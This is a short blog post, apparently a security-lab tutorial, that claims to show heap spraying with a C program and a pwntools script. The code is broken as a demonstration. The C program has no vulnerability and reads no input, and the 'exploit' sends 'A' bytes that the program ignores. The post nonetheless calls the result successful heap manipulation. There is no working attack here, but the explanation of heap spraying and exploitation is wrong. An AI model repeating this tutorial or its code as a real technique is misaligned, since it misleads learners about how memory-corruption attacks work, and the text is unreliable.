strangerRidingCaml
Heap Spray Techniques Lab 본문
728x90
Heap Spray Techniques Lab
In this lab, we will manipulate the heap with heap spray techniques to facilitate exploitation.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with heap manipulation vulnerability.
#include <stdio.h>
#include <stdlib.h>
void vulnerable_function() {
char *ptr = (char *)malloc(64);
if (ptr != NULL) {
// Simulate heap spray
for (int i = 0; i < 64; i++) {
ptr[i] = 'A';
}
printf("Heap spray completed.\n");
free(ptr);
}
}
int main() {
vulnerable_function();
return 0;
}
Save the above code to a file named vulnerable.c
and compile it with the following command:
$ gcc -o vulnerable vulnerable.c
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to perform heap spraying.
from pwn import *
# Specify the path to the vulnerable binary
binary_path = './vulnerable'
# Payload for heap spraying
payload = b'A' * 64
# Launch the exploit
p = process(binary_path)
p.send(payload)
p.recvline() # Receive the output indicating heap spray completion
p.close()
Explanation of the Python script:
- We specify the path to the vulnerable binary and create a payload consisting of 'A' characters to spray the heap.
- We launch the
vulnerable
binary and send the payload to perform heap spraying. - We receive the output indicating heap spray completion.
3. Exploiting the Vulnerability:
Execute the Python script to perform heap spraying:
$ python exploit.py
Once executed, you should observe the output indicating the completion of heap spraying, demonstrating the successful manipulation of the heap using heap spray techniques.
'System hacking' 카테고리의 다른 글
Jump-Oriented Programming (JOP) Lab (0) | 2024.05.08 |
---|---|
Heap Feng Shui Exploitation Lab (0) | 2024.05.08 |
One-Gadgets with PLT/GOT Overwrite Lab (0) | 2024.05.08 |
Race Condition Exploits Lab (0) | 2024.05.08 |
Blind Return-Oriented Programming (BROP) Lab (0) | 2024.05.08 |